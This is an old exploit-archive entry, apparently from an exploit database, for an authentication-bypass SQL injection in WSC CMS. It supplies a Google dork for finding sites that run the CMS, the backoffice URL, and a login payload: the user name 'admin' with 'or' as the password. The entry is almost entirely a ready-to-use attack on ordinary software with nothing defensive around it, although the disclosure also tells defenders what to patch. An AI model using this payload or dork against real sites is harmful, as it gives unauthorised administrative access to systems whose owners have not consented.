[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WSC CMS (Bypass) SQL Injection Vulnerability
# Published : 2010-02-19
# Author : Phenom
# Previous Title : SQL injection vulnerability in Amelia CMS
# Next Title : Trixbox PhonecDirectory.php SQL Injection
------------------------------------------------------
------------------------------------------------------
_____ _
| __ | |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ / _ '_ / _/| '_ ` _
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|___|_| |_|/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################